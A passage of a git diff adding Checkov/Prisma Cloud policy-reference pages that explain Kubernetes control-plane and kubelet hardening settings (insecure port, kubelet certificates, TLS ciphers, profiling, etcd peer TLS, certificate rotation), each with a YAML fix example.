https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/ApiServerInsecurePort.py[CKV_K8S_88] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|Kubernetes,Helm,Kustomize + +|=== + + + +=== Description + + +Do not bind to insecure port. +Setting up the apiserver to serve on an insecure port would allow unauthenticated and unencrypted access to your master node. +This would allow attackers who could access this port, to easily take control of the cluster. + +=== Fix - Buildtime + + +*Kubernetes* + + +* *Kind:* Pod + + +[source,yaml] +---- +{ + "apiVersion: v1 +kind: Pod +metadata: + creationTimestamp: null + labels: + component: kube-apiserver + tier: control-plane + name: kube-apiserver + namespace: kube-system +spec: + containers: + - command: ++ - kube-apiserver ++ - --insecure-port=0 + image: gcr.io/google_containers/kube-apiserver-amd64:v1.6.0 + ...", +} +---- + diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-kubelet-certificate-authority-argument-is-set-as-appropriate.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-kubelet-certificate-authority-argument-is-set-as-appropriate.adoc new file mode 100644 index 000000000..0ca9f9013 --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-kubelet-certificate-authority-argument-is-set-as-appropriate.adoc @@ -0,0 +1,65 @@ +== The --kubelet-certificate-authority argument is not set appropriately +// '--kubelet-certificate-authority' argument not set appropriately + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 524428c1-2e12-442b-a0b7-3fd6a454b27b + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/ApiServerkubeletCertificateAuthority.py[CKV_K8S_73] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|Kubernetes,Helm,Kustomize + +|=== + + + +=== Description + + +Verify kubelet's certificate before establishing connection.The connections from the apiserver to the kubelet are used for fetching logs for pods, attaching (through kubectl) to running pods, and using the kubelet's port-forwarding functionality. +These connections terminate at the kubelet's HTTPS endpoint. +By default, the apiserver does not verify the kubelet's serving certificate, which makes the connection subject to man-in-the-middle attacks, and unsafe to run over untrusted and/or public networks. + +=== Fix - Buildtime + + +*Kubernetes* + + +* *Kind:* Pod + + +[source,yaml] +---- +{ + "apiVersion: v1 +kind: Pod +metadata: + creationTimestamp: null + labels: + component: kube-apiserver + tier: control-plane + name: kube-apiserver + namespace: kube-system +spec: + containers: + - command: ++ - kube-apiserver ++ - --kubelet-certificate-authority=ca.file + image: gcr.io/google_containers/kube-apiserver-amd64:v1.6.0 + ...", +} +---- + diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-kubelet-client-certificate-and-kubelet-client-key-arguments-are-set-as-appropriate.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-kubelet-client-certificate-and-kubelet-client-key-arguments-are-set-as-appropriate.adoc new file mode 100644 index 000000000..b29a85bc1 --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-kubelet-client-certificate-and-kubelet-client-key-arguments-are-set-as-appropriate.adoc @@ -0,0 +1,67 @@ +== The --kubelet-client-certificate and --kubelet-client-key arguments are not set appropriately +// '--kubelet-client-certificate' and '--kubelet-client-key' arguments not set appropriately + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 8dcdae26-1bd2-4a5b-a6a3-31f49e4581f2 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/ApiServerKubeletClientCertAndKey.py[CKV_K8S_72] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|Kubernetes,Helm,Kustomize + +|=== + + + +=== Description + + +Enable certificate based kubelet authentication. +The apiserver, by default, does not authenticate itself to the kubelet's HTTPS endpoints. +The requests from the apiserver are treated anonymously. +You should set up certificate- based kubelet authentication to ensure that the apiserver authenticates itself to kubelets when submitting requests. + +=== Fix - Buildtime + + +*Kubernetes* + + +* *Kind:* Pod + + +[source,yaml] +---- +{ + "apiVersion: v1 +kind: Pod +metadata: + creationTimestamp: null + labels: + component: kube-apiserver + tier: control-plane + name: kube-apiserver + namespace: kube-system +spec: + containers: + - command: ++ - kube-apiserver ++ - --kubelet-client-certificate=/path/to/cert ++ - --kubelet-client-key=/path/to/key + image: gcr.io/google_containers/kube-apiserver-amd64:v1.6.0 + ...", +} +---- + diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-kubelet-https-argument-is-set-to-true.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-kubelet-https-argument-is-set-to-true.adoc new file mode 100644 index 000000000..08a516363 --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-kubelet-https-argument-is-set-to-true.adoc @@ -0,0 +1,95 @@ +== The --kubelet-https argument is not set to True +// '--kubelet-https' argument not set to True + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| bcfe78a3-ec11-4484-bfd0-b2c18e5839e7 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/ApiServerKubeletHttps.py[CKV_K8S_71] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|Kubernetes,Helm,Kustomize + +|=== + +//// +Bridgecrew +Prisma Cloud +* The --kubelet-https argument is not set to True* + + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| bcfe78a3-ec11-4484-bfd0-b2c18e5839e7 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/ApiServerKubeletHttps.py [CKV_K8S_71] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|Kubernetes,Helm,Kustomize + +|=== +//// + + +=== Description + + +Use https for kubelet connections. +Connections from apiserver to kubelets could potentially carry sensitive data such as secrets and keys. +It is thus important to use in-transit encryption for any communication between the apiserver and kubelets. + +=== Fix - Buildtime + + +*Kubernetes* + + +* *Kind* Pod + + +[source,yaml] +---- +{ + "apiVersion: v1 +kind: Pod +metadata: + creationTimestamp: null + labels: + component: kube-apiserver + tier: control-plane + name: kube-apiserver + namespace: kube-system +spec: + containers: + - command: ++ - kube-apiserver ++ - --kubelet-https=true + image: gcr.io/google_containers/kube-apiserver-amd64:v1.6.0 + ...", +} +---- + diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-kubelet-only-makes-use-of-strong-cryptographic-ciphers.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-kubelet-only-makes-use-of-strong-cryptographic-ciphers.adoc new file mode 100644 index 000000000..abaff6bf7 --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-kubelet-only-makes-use-of-strong-cryptographic-ciphers.adoc @@ -0,0 +1,95 @@ +== Kubelet does not use strong cryptographic ciphers + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 3e781500-a383-4f1f-afe9-a5a72b13e1aa + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/KubeletCryptographicCiphers.py[CKV_K8S_151] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Kubernetes,Helm,Kustomize + +|=== + + + +=== Description + + +Ensure that the Kubelet is configured to only use strong cryptographic ciphers. +TLS ciphers have had a number of known vulnerabilities and weaknesses, which can reduce the protection provided by them. +By default Kubernetes supports a number of TLS ciphersuites including some that have security concerns, weakening the protection provided. + +=== Fix - Buildtime + + +*Kubernetes *Kind* Pod* + + + + +[source,yaml] +---- +{ + "apiVersion: v1 +kind: Pod +metadata: + creationTimestamp: null + labels: + component: kube-scheduler + tier: control-plane + name: kube-scheduler + namespace: kube-system +spec: + containers: + - command: ++ - kubelet ++ - --tls-cipher-suites=TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256 + image: gcr.io/google_containers/kube-scheduler-amd64:v1.6.0 + livenessProbe: + failureThreshold: 8 + httpGet: + host: 127.0.0.1 + path: /healthz + port: 6443 + scheme: HTTPS + initialDelaySeconds: 15 + timeoutSeconds: 15 + name: kube-scheduler + resources: + requests: + cpu: 250m + volumeMounts: + - mountPath: /etc/kubernetes/ + name: k8s + readOnly: true + - mountPath: /etc/ssl/certs + name: certs + - mountPath: /etc/pki + name: pki + hostNetwork: true + volumes: + - hostPath: + path: /etc/kubernetes + name: k8s + - hostPath: + path: /etc/ssl/certs + name: certs + - hostPath: + path: /etc/pki + name: pki", +} +---- + diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-make-iptables-util-chains-argument-is-set-to-true.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-make-iptables-util-chains-argument-is-set-to-true.adoc new file mode 100644 index 000000000..0a5f4ad2f --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-make-iptables-util-chains-argument-is-set-to-true.adoc @@ -0,0 +1,68 @@ +== The --make-iptables-util-chains argument is not set to True +// '--make-iptables-util-chains' argument not set to True + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| f85287d7-5df4-4e40-bdb0-ddf4854be1e5 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/KubeletMakeIptablesUtilChains.py[CKV_K8S_145] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Kubernetes,Helm,Kustomize + +|=== + + + +=== Description + + +Allow Kubelet to manage iptables. +Kubelets can automatically manage the required changes to iptables based on how you choose your networking options for the pods. +It is recommended to let kubelets manage the changes to iptables. +This ensures that the iptables configuration remains in sync with pods networking configuration. +Manually configuring iptables with dynamic pod network configuration changes might hamper the communication between pods/containers and to the outside world. +You might have iptables rules too restrictive or too open. + +=== Fix - Buildtime + + +*Kubernetes* + + +* *Resource:* Pod + + +[source,yaml] +---- +{ + "apiVersion: v1 +kind: Pod +metadata: + creationTimestamp: null + labels: + component: kubelet + tier: control-plane + name: kubelet + namespace: kube-system +spec: + containers: + - command: ++ - kubelet ++ - --make-iptables-util-chains=true + image: gcr.io/google_containers/kubelet-amd64:v1.6.0 + ...", +} +---- + diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-peer-auto-tls-argument-is-not-set-to-true.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-peer-auto-tls-argument-is-not-set-to-true.adoc new file mode 100644 index 000000000..a0c1dfa3d --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-peer-auto-tls-argument-is-not-set-to-true.adoc @@ -0,0 +1,10 @@ +== The --peer-auto-tls argument is set to True +// '--peer-auto-tls' argument set to True + +=== Description + + +Do not use automatically generated self-signed certificates for TLS connections between peers. +etcd is a highly-available key value store used by Kubernetes deployments for persistent storage of all of its REST API objects. +These objects are sensitive in nature and should be accessible only by authenticated etcd peers in the etcd cluster. +Hence, do not use self- signed certificates for authentication. diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-peer-cert-file-and-peer-key-file-arguments-are-set-as-appropriate.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-peer-cert-file-and-peer-key-file-arguments-are-set-as-appropriate.adoc new file mode 100644 index 000000000..ac148a5d4 --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-peer-cert-file-and-peer-key-file-arguments-are-set-as-appropriate.adoc @@ -0,0 +1,65 @@ +== The --peer-cert-file and --peer-key-file arguments are not set appropriately +// '--peer-cert-file' and '--peer-key-file' arguments not set appropriately + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 63d9f60f-584d-4545-aa72-3f176dd1f164 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/EtcdPeerFiles.py[CKV_K8S_119] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|Kubernetes,Helm,Kustomize + +|=== + + + +=== Description + + +etcd should be configured to make use of TLS encryption for peer connections. +etcd is a highly-available key value store used by Kubernetes deployments for persistent storage of all of its REST API objects. +These objects are sensitive in nature and should be encrypted in transit and also amongst peers in the etcd clusters. + +=== Fix - Buildtime + + +*Kubernetes* + + +* *Kind:* Pod + + +[source,yaml] +---- +{ + "apiVersion: v1 +kind: Pod +metadata: + creationTimestamp: null + labels: + component: kube-apiserver + tier: control-plane + name: kube-apiserver + namespace: kube-system +spec: + containers: + - command: ++ - etcd ++ - --peer-cert-file=file.pem ++ - --peer-key-file=file.key + image: gcr.io/google_containers/kube-apiserver-amd64:v1.6.0", +} +---- + diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-peer-client-cert-auth-argument-is-set-to-true.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-peer-client-cert-auth-argument-is-set-to-true.adoc new file mode 100644 index 000000000..04d707be2 --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-peer-client-cert-auth-argument-is-set-to-true.adoc @@ -0,0 +1,63 @@ +== The --peer-client-cert-auth argument is not set to True +// '--peer-client-cert-auth' argument not set to True + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 469a0145-d6dd-4e83-8904-02de65a8b94f + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/PeerClientCertAuthTrue.py[CKV_K8S_121] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|Kubernetes,Helm,Kustomize + +|=== + + + +=== Description + + +etcd should be configured for peer authentication. +etcd is a highly-available key value store used by Kubernetes deployments for persistent storage of all of its REST API objects. +These objects are sensitive in nature and should be accessible only by authenticated etcd peers in the etcd cluster. + +=== Fix - Buildtime + + +*Kubernetes* + + +* *Kind:* Pod + + +[source,go] +---- +{ + "apiVersion: v1 +kind: Pod +metadata: + name: etcd + namespace: should-pass +spec: + hostNetwork: true + containers: + - name: "kuku2" + image: "b.gcr.io/kuar/etcd:2.2.0" + args: + ... ++ - "--peer-client-cert-auth=true" + ...", +} +---- + diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-profiling-argument-is-set-to-false-1.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-profiling-argument-is-set-to-false-1.adoc new file mode 100644 index 000000000..30ee5deb2 --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-profiling-argument-is-set-to-false-1.adoc @@ -0,0 +1,66 @@ +== The --profiling argument is not set to False for scheduler +// '--profiling' argument not set to False for scheduler + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| b954f1ae-9d6d-4d52-a1db-9d54bde1b36d + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/SchedulerProfiling.py[CKV_K8S_114] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Kubernetes,Helm,Kustomize + +|=== + + + +=== Description + + +Disable profiling, if not needed. +Profiling allows for the identification of specific performance bottlenecks. +It generates a significant amount of program data that could potentially be exploited to uncover system and program details. +If you are not experiencing any bottlenecks and do not need the profiler for troubleshooting purposes, it is recommended to turn it off to reduce the potential attack surface. + +=== Fix - Buildtime + + +*Kubernetes* + + +* *Kind:* Pod + + +[source,yaml] +---- +{ + "apiVersion: v1 +kind: Pod +metadata: + creationTimestamp: null + labels: + component: kube-scheduler + tier: control-plane + name: kube-scheduler + namespace: kube-system +spec: + containers: + - command: ++ - kube-scheduler ++ - --profiling=false + image: gcr.io/google_containers/kube-scheduler-amd64:v1.6.0", +} +---- + diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-profiling-argument-is-set-to-false-2.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-profiling-argument-is-set-to-false-2.adoc new file mode 100644 index 000000000..b92bdb389 --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-profiling-argument-is-set-to-false-2.adoc @@ -0,0 +1,65 @@ +== The --profiling argument is not set to false for API server +'--profiling' argument not set to false for API server + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 2fa82602-23c7-4cfc-8b78-56743c4b89f4 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/ApiServerProfiling.py[CKV_K8S_90] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Kubernetes,Helm,Kustomize + +|=== + + + +=== Description + + +Disable profiling, if not needed.Profiling allows for the identification of specific performance bottlenecks. +It generates a significant amount of program data that could potentially be exploited to uncover system and program details. +If you are not experiencing any bottlenecks and do not need the profiler for troubleshooting purposes, it is recommended to turn it off to reduce the potential attack surface. + +=== Fix - Buildtime + + +*Kubernetes* + + +* *Kind:* Pod + + +[source,yaml] +---- +{ + "apiVersion: v1 +kind: Pod +metadata: + creationTimestamp: null + labels: + component: kube-apiserver + tier: control-plane + name: kube-apiserver + namespace: kube-system +spec: + containers: + - command: ++ - kube-apiserver ++ - --profiling=false + image: gcr.io/google_containers/kube-apiserver-amd64:v1.6.0 + ...", +} +---- + diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-profiling-argument-is-set-to-false.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-profiling-argument-is-set-to-false.adoc new file mode 100644 index 000000000..0f35e804f --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-profiling-argument-is-set-to-false.adoc @@ -0,0 +1,65 @@ +== The --profiling argument for controller managers is not set to False +// '-profiling' argument for controller managers not set to False + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 7a042645-57fd-45ed-a17e-fed49c8333e9 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerBlockProfiles.py[CKV_K8S_107] + +|Severity +|MEDIUM + +|Subtype +|Build + +|Frameworks +|Kubernetes,Helm,Kustomize + +|=== + + + +=== Description + + +Disable profiling, if not needed. +Profiling allows for the identification of specific performance bottlenecks. +It generates a significant amount of program data that could potentially be exploited to uncover system and program details. +If you are not experiencing any bottlenecks and do not need the profiler for troubleshooting purposes, it is recommended to turn it off to reduce the potential attack surface. + +=== Fix - Buildtime + + +*Kubernetes* + + +* *Kind:* Pod + + +[source,yaml] +---- +{ + " apiVersion: v1 + kind: Pod + metadata: + creationTimestamp: null + labels: + component: kube-controller-manager + tier: control-plane + name: kube-controller-manager + namespace: kube-system + spec: + containers: + - command: + - kube-controller-manager ++ - --profiling=false + image: gcr.io/google_containers/kube-controller-manager-amd64:v1.6.0", +} +---- + diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-protect-kernel-defaults-argument-is-set-to-true.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-protect-kernel-defaults-argument-is-set-to-true.adoc new file mode 100644 index 000000000..2095a4a0a --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-protect-kernel-defaults-argument-is-set-to-true.adoc @@ -0,0 +1,67 @@ +== The --protect-kernel-defaults argument is not set to True +// '--protect-kernel-defaults' argument not set to True + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 3bbdacbb-5205-4f71-b7c4-baed2e5300fc + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/KubeletProtectKernelDefaults.py[CKV_K8S_144] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Kubernetes,Helm,Kustomize + +|=== + + + +=== Description + + +Protect tuned kernel parameters from overriding kubelet default kernel parameter values. +Kernel parameters are usually tuned and hardened by the system administrators before putting the systems into production. +These parameters protect the kernel and the system. +Your kubelet kernel defaults that rely on such parameters should be appropriately set to match the desired secured system state. +Ignoring this could potentially lead to running pods with undesired kernel behavior. + +=== Fix - Buildtime + + +*Kubernetes* + + +* *Kind:* Pod + + +[source,yaml] +---- +{ + "apiVersion: v1 +kind: Pod +metadata: + creationTimestamp: null + labels: + component: kubelet + tier: control-plane + name: kubelet + namespace: kube-system +spec: + containers: + - command: ++ - kubelet ++ - --protect-kernel-defaults=true + image: gcr.io/google_containers/kubelet-amd64:v1.6.0 + ...", +} +---- + diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-read-only-port-argument-is-set-to-0.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-read-only-port-argument-is-set-to-0.adoc new file mode 100644 index 000000000..00a64dfd7 --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-read-only-port-argument-is-set-to-0.adoc @@ -0,0 +1,65 @@ +== The --read-only-port argument is not set to 0 +// 'The '--read-only-port' argument not set to 0 + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 127c19c7-71ed-4aaa-9786-b2aecb556b83 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/KubeletReadOnlyPort.py[CKV_K8S_141] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Kubernetes,Helm,Kustomize + +|=== + + + +=== Description + + +Disable the read-only port. +The Kubelet process provides a read-only API in addition to the main Kubelet API. +Unauthenticated access is provided to this read-only API which could possibly retrieve potentially sensitive information about the cluster. + +=== Fix - Buildtime + + +*Kubernetes* + + +* *Kind:* Pod + + +[source,yaml] +---- +{ + "apiVersion: v1 +kind: Pod +metadata: + creationTimestamp: null + labels: + component: kubelet + tier: control-plane + name: kubelet + namespace: kube-system +spec: + containers: + - command: ++ - kubelet ++ - --read-only-port=0 + image: gcr.io/google_containers/kubelet-amd64:v1.6.0 + ...", +} +---- + diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-request-timeout-argument-is-set-as-appropriate.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-request-timeout-argument-is-set-as-appropriate.adoc new file mode 100644 index 000000000..a4ac1a548 --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-request-timeout-argument-is-set-as-appropriate.adoc @@ -0,0 +1,67 @@ +== The --request-timeout argument is not set appropriately +// '--request-timeout' argument not set appropriately + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 36b3a264-517b-4b3c-ab08-bfe8fe9326e7 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/ApiServerRequestTimeout.py[CKV_K8S_95] + +|Severity +|MEDIUM + +|Subtype +|Build + +|Frameworks +|Kubernetes,Helm,Kustomize + +|=== + + + +=== Description + + +Set global request timeout for API server requests as appropriate. +Setting global request timeout allows extending the API server request timeout limit to a duration appropriate to the user's connection speed. +By default, it is set to 60 seconds which might be problematic on slower connections making cluster resources inaccessible once the data volume for requests exceeds what can be transmitted in 60 seconds. +But, setting this timeout limit to be too large can exhaust the API server resources making it prone to Denial-of-Service attack. +Hence, it is recommended to set this limit as appropriate and change the default limit of 60 seconds only if needed. + +=== Fix - Buildtime + + +*Kubernetes* + + +* *Kind:* Pod + + +[source,yaml] +---- +{ + "apiVersion: v1 +kind: Pod +metadata: + creationTimestamp: null + labels: + component: kube-apiserver + tier: control-plane + name: kube-apiserver + namespace: kube-system +spec: + containers: + - command: ++ - kube-apiserver ++ - --request-timeout=2m3s + image: gcr.io/google_containers/kube-apiserver-amd64:v1.6.0 + ...", +} +---- + diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-root-ca-file-argument-is-set-as-appropriate.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-root-ca-file-argument-is-set-as-appropriate.adoc new file mode 100644 index 000000000..41cf5c47a --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-root-ca-file-argument-is-set-as-appropriate.adoc @@ -0,0 +1,65 @@ +== The --root-ca-file argument for controller managers is not set appropriately +// 'The '--root-ca-file' argument for controller managers not set appropriately + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| aa9d1111-eb5b-4549-8ea7-3d57d9d59f93 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerRootCAFile.py[CKV_K8S_111] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|Kubernetes,Helm,Kustomize + +|=== + + + +=== Description + + +Allow pods to verify the API server's serving certificate before establishing connections. +Processes running within pods that need to contact the API server must verify the API server's serving certificate. +Failing to do so could be a subject to man-in-the-middle attacks. +Providing the root certificate for the API server's serving certificate to the controller manager with the --root-ca-file argument allows the controller manager to inject the trusted bundle into pods so that they can verify TLS connections to the API server. + +=== Fix - Buildtime + + +*Kubernetes* + + +* *Kind:* Pod + + +[source,yaml] +---- +{ + " apiVersion: v1 + kind: Pod + metadata: + creationTimestamp: null + labels: + component: kube-controller-manager + tier: control-plane + name: kube-controller-manager + namespace: kube-system + spec: + containers: + - command: + - kube-controller-manager ++ - --root-ca-file=private.pem + image: gcr.io/google_containers/kube-controller-manager-amd64:v1.6.0", +} +---- diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-rotate-certificates-argument-is-not-set-to-false.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-rotate-certificates-argument-is-not-set-to-false.adoc new file mode 100644 index 000000000..69aa896ad --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-rotate-certificates-argument-is-not-set-to-false.adoc @@ -0,0 +1,67 @@ +== The --rotate-certificates argument is set to false +// '--rotate-certificates' argument set to False + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 82c6e27a-d022-4cd7-a277-49945c706c14 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/KubletRotateCertificates.py[CKV_K8S_149] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|Kubernetes,Helm,Kustomize + +|=== + + + +=== Description + + +Enable kubelet client certificate rotation. +The --rotate-certificates setting causes the kubelet to rotate its client certificates by creating new CSRs as its existing credentials expire. +This automated periodic rotation ensures that the there is no downtime due to expired certificates and thus addressing availability in the CIA security triad. + +NOTE: This recommendation only applies if you let kubelets get their certificates from the API server. In case your kubelet certificates come from an outside authority/tool (e.g.Vault) then you need to take care of rotation yourself. + + +=== Fix - Buildtime + + +*Kubernetes *Kind* Pod* + + + + +[source,yaml] +---- +{ + "apiVersion: v1 +kind: Pod +metadata: + creationTimestamp: null + labels: + component: kube-scheduler + tier: control-plane + name: kube-scheduler + namespace: kube-system +spec: + containers: + - command: + + - kubelet + + - --rotate-certificates=true + image: gcr.io/google_containers/kube-scheduler-amd64:v1.6.0 + ...", +} +---- + diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-rotatekubeletservercertificate-argument-is-set-to-true-for-controller-manager.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-rotatekubeletservercertificate-argument-is-set-to-true-for-controller-manager.adoc new file mode 100644 index 000000000..28ea1b77b --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-rotatekubeletservercertificate-argument-is-set-to-true-for-controller-manager.adoc @@ -0,0 +1,66 @@ +== The RotateKubeletServerCertificate argument for controller managers is not set to True +// 'RotateKubeletServerCertificate' argument for controller managers not set to True + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 9502fa48-b6f7-42a4-9b06-ac1e5b1bff28 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/RotateKubeletServerCertificate.py[CKV_K8S_112] + +|Severity +|MEDIUM + +|Subtype +|Build + +|Frameworks +|Kubernetes,Helm,Kustomize + +|=== + + + +=== Description + + +Enable kubelet server certificate rotation. +RotateKubeletServerCertificate causes the kubelet to both request a serving certificate after bootstrapping its client credentials and rotate the certificate as its existing credentials expire. +This automated periodic rotation ensures that the there are no downtimes due to expired certificates and thus addressing availability in the CIA security triad. + +NOTE: This recommendation only applies if you let kubelets get their certificates from the API server. In case your kubelet certificates come from an outside authority/tool (e.g. Vault) then you need to take care of rotation yourself. + + +=== Fix - Buildtime + + +*Kubernetes *Kind:* Pod* + + + + +[source,yaml] +---- +{ + "apiVersion: v1 +kind: Pod +metadata: + creationTimestamp: null + labels: + component: kubelet + tier: control-plane + name: kubelet + namespace: kube-system +spec: + containers: + - command: ++ - kubelet ++ - 